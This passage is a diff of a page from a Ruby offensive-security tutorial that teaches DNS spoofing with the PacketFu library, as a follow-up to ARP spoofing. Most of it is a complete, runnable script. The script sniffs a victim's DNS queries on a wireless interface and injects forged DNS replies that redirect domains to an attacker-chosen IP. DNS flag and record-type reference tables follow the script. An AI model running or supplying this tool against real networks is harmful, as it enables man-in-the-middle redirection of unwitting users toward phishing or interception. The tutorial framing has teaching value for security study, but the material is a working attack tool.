<span class="hljs-keyword">if</span> raw_domain[<span class="hljs-number">0</span>].ord == <span class="hljs-number">0</span>
|
|
1328
|
+
puts <span class="hljs-string">"ERROR : THE RAW STARTS WITH 0"</span>
|
|
1329
|
+
<span class="hljs-keyword">return</span> raw_domain[<span class="hljs-number">1</span>..-<span class="hljs-number">1</span>]
|
|
1330
|
+
<span class="hljs-keyword">end</span>
|
|
1331
|
+
|
|
1332
|
+
fqdn = <span class="hljs-string">""</span>
|
|
1333
|
+
length_offset = raw_domain[<span class="hljs-number">0</span>].ord
|
|
1334
|
+
full_length = raw_domain[ <span class="hljs-number">0</span>..length_offset ].length
|
|
1335
|
+
domain_name = raw_domain[(full_length - length_offset)..length_offset]
|
|
1336
|
+
|
|
1337
|
+
<span class="hljs-keyword">while</span> length_offset != <span class="hljs-number">0</span>
|
|
1338
|
+
fqdn << domain_name + <span class="hljs-string">"."</span>
|
|
1339
|
+
length_offset = raw_domain[full_length].ord
|
|
1340
|
+
domain_name = raw_domain[full_length + <span class="hljs-number">1</span>..full_length + length_offset]
|
|
1341
|
+
full_length = raw_domain[<span class="hljs-number">0</span>..full_length + length_offset].length
|
|
1342
|
+
<span class="hljs-keyword">end</span>
|
|
1343
|
+
|
|
1344
|
+
<span class="hljs-keyword">return</span> fqdn.chomp!(<span class="hljs-string">'.'</span>)
|
|
1345
|
+
<span class="hljs-keyword">end</span>
|
|
1346
|
+
|
|
1347
|
+
<span class="hljs-comment"># * We need parse/analyze the valid UDP packets only</span>
|
|
1348
|
+
<span class="hljs-comment"># * We need to make sure this packet is a DNS query</span>
|
|
1349
|
+
<span class="hljs-comment">#</span>
|
|
1350
|
+
<span class="hljs-comment"># Find the DNS packets</span>
|
|
1351
|
+
<span class="hljs-comment">#</span>
|
|
1352
|
+
capture.stream.each <span class="hljs-keyword">do</span> |pkt|
|
|
1353
|
+
<span class="hljs-comment"># Make sure we can parse the packet; if we can, parse it</span>
|
|
1354
|
+
<span class="hljs-keyword">if</span> <span class="hljs-constant">UDPPacket</span>.can_parse?(pkt)
|
|
1355
|
+
<span class="hljs-variable">@packet</span> = <span class="hljs-constant">Packet</span>.parse(pkt)
|
|
1356
|
+
|
|
1357
|
+
<span class="hljs-comment"># Make sure we have a query packet</span>
|
|
1358
|
+
dns_query = <span class="hljs-variable">@packet</span>.payload[<span class="hljs-number">2</span>..<span class="hljs-number">3</span>].to_s
|
|
1359
|
+
|
|
1360
|
+
<span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">"\x01\x00"</span>
|
|
1361
|
+
<span class="hljs-comment"># Get the domain name into a readable format</span>
|
|
1362
|
+
domain_name = <span class="hljs-variable">@packet</span>.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL QUERY</span>
|
|
1363
|
+
fqdn = readable(domain_name)
|
|
1364
|
+
|
|
1365
|
+
<span class="hljs-comment"># Ignore non query packet</span>
|
|
1366
|
+
<span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> domain_name.<span class="hljs-keyword">nil</span>?
|
|
1367
|
+
|
|
1368
|
+
puts <span class="hljs-string">"DNS request for: "</span> + fqdn
|
|
1369
|
+
<span class="hljs-keyword">end</span>
|
|
1370
|
+
<span class="hljs-keyword">end</span>
|
|
1371
|
+
<span class="hljs-keyword">end</span>
|
|
1372
|
+
</code></pre>
|
|
1373
|
+
<p>Till now we successfully finished <a href="module_0x3__network_kung_fu/arp_spoofing.md">ARP Spoofing</a> then DNS capturing but still we need to replace/spoof the original response to our domain. e.g. attacker.zone, now we have to build a DNS response instead of spoofed to be sent. So what we need?</p>
|
|
1374
|
+
<ul>
|
|
1375
|
+
<li>taking the IP we are going to redirect the user to (the spoofing_ip)<ul>
|
|
1376
|
+
<li>converting it into hex using the <code>to_i</code> and <code>pack</code> methods.</li>
|
|
1377
|
+
</ul>
|
|
1378
|
+
</li>
|
|
1379
|
+
<li>From there we create a new UDP packet using the data contained in <code>@ourInfo</code> (IP and MAC) and fill in the normal UDP fields.<ul>
|
|
1380
|
+
<li>I take most of this information straight from the DNS Query packet.</li>
|
|
1381
|
+
</ul>
|
|
1382
|
+
</li>
|
|
1383
|
+
<li>The next step is to create the DNS Response.<ul>
|
|
1384
|
+
<li>the best way to understand the code here is to look at a DNS header and then</li>
|
|
1385
|
+
<li>take the bit map of the HEX values and apply them to the header.</li>
|
|
1386
|
+
<li>This will let you see what flags are being set.</li>
|
|
1387
|
+
</ul>
|
|
1388
|
+
</li>
|
|
1389
|
+
<li>From here, we just calculate the checksum for the UDP packet and send it out to the target's machine.</li>
|
|
1390
|
+
</ul>
|
|
1391
|
+
<table>
|
|
1392
|
+
<thead>
|
|
1393
|
+
<tr>
|
|
1394
|
+
<th style="text-align:center"><img src="dns_spoofing_Wireshark2.png" alt="Wireshark"></th>
|
|
1395
|
+
</tr>
|
|
1396
|
+
</thead>
|
|
1397
|
+
<tbody>
|
|
1398
|
+
<tr>
|
|
1399
|
+
<td style="text-align:center"><strong>Figure 2.</strong> DNS Response Payload</td>
|
|
1400
|
+
</tr>
|
|
1401
|
+
</tbody>
|
|
1402
|
+
</table>
|
|
1403
|
+
<pre><code class="lang-ruby">
|
|
1404
|
+
spoofing_ip = <span class="hljs-string">"69.171.234.21"</span>
|
|
1405
|
+
spoofing_ip.split(<span class="hljs-string">'.'</span>).map {|octet| octet.to_i}.pack(<span class="hljs-string">'c*'</span>)
|
|
1406
|
+
|
|
1407
|
+
response = <span class="hljs-constant">UDPPacket</span>.new(<span class="hljs-symbol">:config</span> => <span class="hljs-constant">PacketFu::Utils</span>.ifconfig(<span class="hljs-string">"wlan0"</span>))
|
|
1408
|
+
response.udp_src = packet.udp_dst
|
|
1409
|
+
response.udp_dst = packet.udp_src
|
|
1410
|
+
response.ip_saddr = packet.ip_daddr
|
|
1411
|
+
response.ip_daddr = <span class="hljs-string">"192.168.0.21"</span>
|
|
1412
|
+
response.eth_daddr = <span class="hljs-string">"00:0C:29:38:1D:61"</span>
|
|
1413
|
+
</code></pre>
|
|
1414
|
+
<p>Wrapping up </p>
|
|
1415
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
|
1416
|
+
<span class="hljs-comment"># -*- coding: binary -*-</span>
|
|
1417
|
+
|
|
1418
|
+
<span class="hljs-comment"># Start the capture process</span>
|
|
1419
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'packetfu'</span>
|
|
1420
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'pp'</span>
|
|
1421
|
+
<span class="hljs-keyword">include</span> <span class="hljs-constant">PacketFu</span>
|
|
1422
|
+
|
|
1423
|
+
|
|
1424
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">readable</span><span class="hljs-params">(raw_domain)</span></span>
|
|
1425
|
+
|
|
1426
|
+
<span class="hljs-comment"># Prevent processing non domain</span>
|
|
1427
|
+
<span class="hljs-keyword">if</span> raw_domain[<span class="hljs-number">0</span>].ord == <span class="hljs-number">0</span>
|
|
1428
|
+
puts <span class="hljs-string">"ERROR : THE RAW STARTS WITH 0"</span>
|
|
1429
|
+
<span class="hljs-keyword">return</span> raw_domain[<span class="hljs-number">1</span>..-<span class="hljs-number">1</span>]
|
|
1430
|
+
<span class="hljs-keyword">end</span>
|
|
1431
|
+
|
|
1432
|
+
fqdn = <span class="hljs-string">""</span>
|
|
1433
|
+
length_offset = raw_domain[<span class="hljs-number">0</span>].ord
|
|
1434
|
+
full_length = raw_domain[ <span class="hljs-number">0</span>..length_offset ].length
|
|
1435
|
+
domain_name = raw_domain[(full_length - length_offset)..length_offset]
|
|
1436
|
+
|
|
1437
|
+
<span class="hljs-keyword">while</span> length_offset != <span class="hljs-number">0</span>
|
|
1438
|
+
fqdn << domain_name + <span class="hljs-string">"."</span>
|
|
1439
|
+
length_offset = raw_domain[full_length].ord
|
|
1440
|
+
domain_name = raw_domain[full_length + <span class="hljs-number">1</span> .. full_length + length_offset]
|
|
1441
|
+
full_length = raw_domain[<span class="hljs-number">0</span> .. full_length + length_offset].length
|
|
1442
|
+
<span class="hljs-keyword">end</span>
|
|
1443
|
+
|
|
1444
|
+
<span class="hljs-keyword">return</span> fqdn.chomp!(<span class="hljs-string">'.'</span>)
|
|
1445
|
+
<span class="hljs-keyword">end</span>
|
|
1446
|
+
|
|
1447
|
+
<span class="hljs-comment">#</span>
|
|
1448
|
+
<span class="hljs-comment"># Send Response</span>
|
|
1449
|
+
<span class="hljs-comment">#</span>
|
|
1450
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">spoof_response</span><span class="hljs-params">(packet, domain)</span></span>
|
|
1451
|
+
|
|
1452
|
+
attackerdomain_name = <span class="hljs-string">'rubyfu.net'</span>
|
|
1453
|
+
attackerdomain_ip = <span class="hljs-string">'54.243.253.221'</span>.split(<span class="hljs-string">'.'</span>).map {|oct| oct.to_i}.pack(<span class="hljs-string">'c*'</span>) <span class="hljs-comment"># Spoofing IP</span>
|
|
1454
|
+
|
|
1455
|
+
<span class="hljs-comment"># Build UDP packet</span>
|
|
1456
|
+
response = <span class="hljs-constant">UDPPacket</span>.new(<span class="hljs-symbol">:config</span> => <span class="hljs-constant">PacketFu::Utils</span>.ifconfig(<span class="hljs-string">"wlan0"</span>))
|
|
1457
|
+
response.udp_src = packet.udp_dst <span class="hljs-comment"># source port</span>
|
|
1458
|
+
response.udp_dst = packet.udp_src <span class="hljs-comment"># destination port</span>
|
|
1459
|
+
response.ip_saddr = packet.ip_daddr <span class="hljs-comment"># modem's IP address to be source</span>
|
|
1460
|
+
response.ip_daddr = packet.ip_saddr <span class="hljs-comment"># victim's IP address to be destination</span>
|
|
1461
|
+
response.eth_daddr = packet.eth_saddr <span class="hljs-comment"># the victim's MAC address</span>
|
|
1462
|
+
response.payload = packet.payload[<span class="hljs-number">0</span>,<span class="hljs-number">1</span>] <span class="hljs-comment"># Transaction ID</span>
|
|
1463
|
+
response.payload += <span class="hljs-string">"\x81\x80"</span> <span class="hljs-comment"># Flags: Reply code: No error (0)</span>
|
|
1464
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Question: 1</span>
|
|
1465
|
+
response.payload += <span class="hljs-string">"\x00\x00"</span> <span class="hljs-comment"># Answer RRs: 0</span>
|
|
1466
|
+
response.payload += <span class="hljs-string">"\x00\x00"</span> <span class="hljs-comment"># Authority RRs: 0</span>
|
|
1467
|
+
response.payload += <span class="hljs-string">"\x00\x00"</span> <span class="hljs-comment"># Additional RRs: 0</span>
|
|
1468
|
+
response.payload += attackerdomain_name.split(<span class="hljs-string">'.'</span>).map <span class="hljs-keyword">do</span> |section| <span class="hljs-comment"># Queries | Name: , Convert domain to DNS style(the opposite of readable method)</span>
|
|
1469
|
+
[section.size.chr, section.chars.map {|c| <span class="hljs-string">'\x%x'</span> % c.ord}.join]
|
|
1470
|
+
<span class="hljs-keyword">end</span>.join + <span class="hljs-string">"\x00"</span>
|
|
1471
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Queries | Type: A (Host address)</span>
|
|
1472
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Queries | Class: IN (0x0001)</span>
|
|
1473
|
+
response.payload += <span class="hljs-string">"\xc0\x0c"</span> <span class="hljs-comment"># Answer | Name: twitter.com</span>
|
|
1474
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Answer | Type: A (Host address)</span>
|
|
1475
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Answer | Class: IN (0x0001)</span>
|
|
1476
|
+
response.payload += <span class="hljs-string">"\x00\x00\x00\x25"</span> <span class="hljs-comment"># Answer | Time to live: 37 seconds</span>
|
|
1477
|
+
response.payload += <span class="hljs-string">"\x00\x04"</span> <span class="hljs-comment"># Answer | Data length: 4</span>
|
|
1478
|
+
response.payload += attackerdomain_ip <span class="hljs-comment"># Answer | Addr</span>
|
|
1479
|
+
response.recalc <span class="hljs-comment"># Calculate the packet</span>
|
|
1480
|
+
response.to_w(response.iface) <span class="hljs-comment"># Send the packet through our interface</span>
|
|
1481
|
+
<span class="hljs-keyword">end</span>
|
|
1482
|
+
|
|
1483
|
+
filter = <span class="hljs-string">"udp and port 53 and host "</span> + <span class="hljs-string">"192.168.0.21"</span>
|
|
1484
|
+
<span class="hljs-variable">@capture</span> = <span class="hljs-constant">Capture</span>.new(<span class="hljs-symbol">:iface</span> => <span class="hljs-string">"wlan0"</span>, <span class="hljs-symbol">:start</span> => <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:promisc</span> => <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:filter</span> => filter, <span class="hljs-symbol">:save</span> => <span class="hljs-keyword">true</span>)
|
|
1485
|
+
<span class="hljs-comment"># Find the DNS packets</span>
|
|
1486
|
+
<span class="hljs-variable">@capture</span>.stream.each <span class="hljs-keyword">do</span> |pkt|
|
|
1487
|
+
<span class="hljs-comment"># Make sure we can parse the packet; if we can, parse it</span>
|
|
1488
|
+
<span class="hljs-keyword">if</span> <span class="hljs-constant">UDPPacket</span>.can_parse?(pkt)
|
|
1489
|
+
packet = <span class="hljs-constant">Packet</span>.parse(pkt)
|
|
1490
|
+
|
|
1491
|
+
<span class="hljs-comment"># Get the offset of the query type: (request=\x01\x00, response=\x81\x80)</span>
|
|
1492
|
+
dns_query = packet.payload[<span class="hljs-number">2</span>..<span class="hljs-number">3</span>].to_s
|
|
1493
|
+
|
|
1494
|
+
<span class="hljs-comment"># Make sure we have a dns query packet</span>
|
|
1495
|
+
<span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">"\x01\x00"</span>
|
|
1496
|
+
<span class="hljs-comment"># Get the domain name into a readable format</span>
|
|
1497
|
+
domain_name = packet.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL DOMAIN</span>
|
|
1498
|
+
fqdn = readable(domain_name)
|
|
1499
|
+
<span class="hljs-comment"># Ignore non query packet</span>
|
|
1500
|
+
<span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> domain_name.<span class="hljs-keyword">nil</span>?
|
|
1501
|
+
puts <span class="hljs-string">"DNS request for: "</span> + fqdn
|
|
1502
|
+
|
|
1503
|
+
<span class="hljs-keyword">end</span>
|
|
1504
|
+
<span class="hljs-comment"># Make sure we have a dns reply packet</span>
|
|
1505
|
+
<span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">"\x81\x80"</span>
|
|
1506
|
+
domain_name = packet.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL DOMAIN</span>
|
|
1507
|
+
fqdn = readable(domain_name)
|
|
1508
|
+
puts <span class="hljs-string">"[*] Start Spoofing: "</span> + fqdn
|
|
1509
|
+
spoof_response packet, domain_name
|
|
1510
|
+
<span class="hljs-keyword">end</span>
|
|
1511
|
+
|
|
1512
|
+
<span class="hljs-keyword">end</span>
|
|
1513
|
+
<span class="hljs-keyword">end</span>
|
|
1514
|
+
</code></pre>
|
|
1515
|
+
<p><a href="https://github.com/SilverFoxx/Spoofa/blob/master/spoofa" target="_blank">https://github.com/SilverFoxx/Spoofa/blob/master/spoofa</a></p>
|
|
1516
|
+
<p>Sources<sup><a href="#fn_1" id="reffn_1">1</a></sup> <sup><a href="#fn_2" id="reffn_2">2</a></sup> - The code has been modified and fixed</p>
|
|
1517
|
+
<h2 id=""><a name="" class="plugin-anchor" href="#"><span class="fa fa-link"></span></a><br><br><br></h2>
|
|
1518
|
+
<blockquote id="fn_1">
|
|
1519
|
+
<sup>1</sup>. <a href="http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/" target="_blank">DNS Spoofing Using PacketFu</a><a href="#reffn_1" title="Jump back to footnote [1] in the text."> ↩</a>
|
|
1520
|
+
</blockquote>
|
|
1521
|
+
<blockquote id="fn_2">
|
|
1522
|
+
<sup>2</sup>. <a href="http://tuftsdev.github.io/DefenseOfTheDarkArts/assignments/manipulatingthenetworkwithpacketfu-110314111058-phpapp01.pdf" target="_blank">Manipulating The Network with PacketFu</a><a href="#reffn_2" title="Jump back to footnote [2] in the text."> ↩</a>
|
|
1523
|
+
</blockquote>
|
|
1524
|
+
<blockquote id="fn_3">
|
|
1525
|
+
<sup>3</sup>. <a href="http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-12" target="_blank">DNS Header Flags</a><a href="#reffn_3" title="Jump back to footnote [3] in the text."> ↩</a>
|
|
1526
|
+
</blockquote>
|
|
1527
|
+
<table>
|
|
1528
|
+
<thead>
|
|
1529
|
+
<tr>
|
|
1530
|
+
<th style="text-align:center">Bit</th>
|
|
1531
|
+
<th>Flag</th>
|
|
1532
|
+
<th>Description</th>
|
|
1533
|
+
<th>Reference</th>
|
|
1534
|
+
</tr>
|
|
1535
|
+
</thead>
|
|
1536
|
+
<tbody>
|
|
1537
|
+
<tr>
|
|
1538
|
+
<td style="text-align:center">bit 5</td>
|
|
1539
|
+
<td>AA</td>
|
|
1540
|
+
<td>Authoritative Answer</td>
|
|
1541
|
+
<td>[RFC1035]</td>
|
|
1542
|
+
</tr>
|
|
1543
|
+
<tr>
|
|
1544
|
+
<td style="text-align:center">bit 6</td>
|
|
1545
|
+
<td>TC</td>
|
|
1546
|
+
<td>Truncated Response</td>
|
|
1547
|
+
<td>[RFC1035]</td>
|
|
1548
|
+
</tr>
|
|
1549
|
+
<tr>
|
|
1550
|
+
<td style="text-align:center">bit 7</td>
|
|
1551
|
+
<td>RD</td>
|
|
1552
|
+
<td>Recursion Desired</td>
|
|
1553
|
+
<td>[RFC1035]</td>
|
|
1554
|
+
</tr>
|
|
1555
|
+
<tr>
|
|
1556
|
+
<td style="text-align:center">bit 8</td>
|
|
1557
|
+
<td>RA</td>
|
|
1558
|
+
<td>Recursion Allowed</td>
|
|
1559
|
+
<td>[RFC1035]</td>
|
|
1560
|
+
</tr>
|
|
1561
|
+
<tr>
|
|
1562
|
+
<td style="text-align:center">bit 9</td>
|
|
1563
|
+
<td></td>
|
|
1564
|
+
<td>Reserved</td>
|
|
1565
|
+
<td></td>
|
|
1566
|
+
</tr>
|
|
1567
|
+
<tr>
|
|
1568
|
+
<td style="text-align:center">bit 10</td>
|
|
1569
|
+
<td>AD</td>
|
|
1570
|
+
<td>Authentic Data</td>
|
|
1571
|
+
<td>[RFC4035]</td>
|
|
1572
|
+
</tr>
|
|
1573
|
+
<tr>
|
|
1574
|
+
<td style="text-align:center">bit 11</td>
|
|
1575
|
+
<td>CD</td>
|
|
1576
|
+
<td>Checking Disabled</td>
|
|
1577
|
+
<td>[RFC4035]</td>
|
|
1578
|
+
</tr>
|
|
1579
|
+
</tbody>
|
|
1580
|
+
</table>
|
|
1581
|
+
<blockquote id="fn_4">
|
|
1582
|
+
<sup>4</sup>. <a href="http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4" target="_blank">DNS Lookups Types</a><a href="#reffn_4" title="Jump back to footnote [4] in the text."> ↩</a>
|
|
1583
|
+
</blockquote>
|
|
1584
|
+
<table>
|
|
1585
|
+
<thead>
|
|
1586
|
+
<tr>
|
|
1587
|
+
<th style="text-align:center">Type</th>
|
|
1588
|
+
<th style="text-align:center">Value</th>
|
|
1589
|
+
<th style="text-align:center">Description</th>
|
|
1590
|
+
</tr>
|
|
1591
|
+
</thead>
|
|
1592
|
+
<tbody>
|
|
1593
|
+
<tr>
|
|
1594
|
+
<td style="text-align:center">A</td>
|
|
1595
|
+
<td style="text-align:center">1</td>
|
|
1596
|
+
<td style="text-align:center">IP Address</td>
|
|
1597
|
+
</tr>
|
|
1598
|
+
<tr>
|
|
1599
|
+
<td style="text-align:center">NS</td>
|
|
1600
|
+
<td style="text-align:center">2</td>
|
|
1601
|
+
<td style="text-align:center">Name Server</td>
|
|
1602
|
+
</tr>
|
|
1603
|
+
<tr>
|
|
1604
|
+
<td style="text-align:center">CNAME</td>
|
|
1605
|
+
<td style="text-align:center">5</td>
|
|
1606
|
+
<td style="text-align:center">Alias of a domain name</td>
|
|
1607
|
+
</tr>
|
|
1608
|
+
<tr>
|
|
1609
|
+
<td style="text-align:center">PTR</td>
|
|
1610
|
+
<td style="text-align:center">12</td>
|
|
1611
|
+
<td style="text-align:center">Reverse DNS Lookup using the IP Address</td>
|
|
1612
|
+
</tr>
|
|
1613
|
+
<tr>
|
|
1614
|
+
<td style="text-align:center">HINFO</td>
|
|
1615
|
+
<td style="text-align:center">13</td>
|
|
1616
|
+
<td style="text-align:center">Host Information</td>
|
|
1617
|
+
</tr>
|
|
1618
|
+
<tr>
|
|
1619
|
+
<td style="text-align:center">MX</td>
|
|
1620
|
+
<td style="text-align:center">15</td>
|
|
1621
|
+
<td style="text-align:center">MX Record</td>
|
|
1622
|
+
</tr>
|
|
1623
|
+
<tr>
|
|
1624
|
+
<td style="text-align:center">AXFR</td>
|
|
1625
|
+
<td style="text-align:center">252</td>
|
|
1626
|
+
<td style="text-align:center">Request for Zone Transfer</td>
|
|
1627
|
+
</tr>
|
|
1628
|
+
<tr>
|
|
1629
|
+
<td style="text-align:center">ANY</td>
|
|
1630
|
+
<td style="text-align:center">255</td>
|
|
1631
|
+
<td style="text-align:center">Request for All Records</td>
|
|
1632
|
+
</tr>
|
|
1633
|
+
</tbody>
|
|
1634
|
+
</table>
|
|
1635
|
+
|
|
1636
|
+
|
|
1637
|
+
</section>
|
|
1638
|
+
|
|
1639
|
+
|
|
1640
|
+
</div>
|
|
1641
|
+
</div>
|
|
1642
|
+
</div>
|
|
1643
|
+
|
|
1644
|
+
|
|
1645
|
+
<a href="../module_0x3__network_kung_fu/arp_spoofing.html" class="navigation navigation-prev " aria-label="Previous page: ARP Spoofing"><i class="fa fa-angle-left"></i></a>
|
|
1646
|
+
|
|
1647
|
+
|
|
1648
|
+
<a href="../module_0x4__web_kung_fu/index.html" class="navigation navigation-next " aria-label="Next page: Module 0x4 | Web Kung Fu"><i class="fa fa-angle-right"></i></a>
|
|
1649
|
+
|
|
1650
|
+
</div>
|
|
1651
|
+
</div>
|
|
1652
|
+
|
|
1653
|
+
|
|
1654
|
+
<script src="../gitbook/app.js"></script>
|
|
1655
|
+
|
|
1656
|
+
|
|
1657
|
+
<script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
|
|
1658
|
+
|
|
1659
|
+
|
|
1660
|
+
|
|
1661
|
+
<script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
|
|
1662
|
+
|
|
1663
|
+
|
|
1664
|
+
|
|
1665
|
+
<script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
|
|
1666
|
+
|
|
1667
|
+
|
|
1668
|
+
|
|
1669
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
|
|
1670
|
+
|
|
1671
|
+
|
|
1672
|
+
|
|
1673
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
|
|
1674
|
+
|
|
1675
|
+
|
|
1676
|
+
|
|
1677
|
+
<script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
|
|
1678
|
+
|
|
1679
|
+
|
|
1680
|
+
|
|
1681
|
+
<script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
|
|
1682
|
+
|
|
1683
|
+
|
|
1684
|
+
<script>
|
|
1685
|
+
require(["gitbook"], function(gitbook) {
|
|
1686
|
+
var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
|
|
1687
|
+
gitbook.start(config);
|
|
1688
|
+
});
|
|
1689
|
+
</script>
|
|
1690
|
+
|
|
1691
|
+
|
|
1692
|
+
</body>
|
|
1693
|
+
|
|
1694
|
+
</html>
|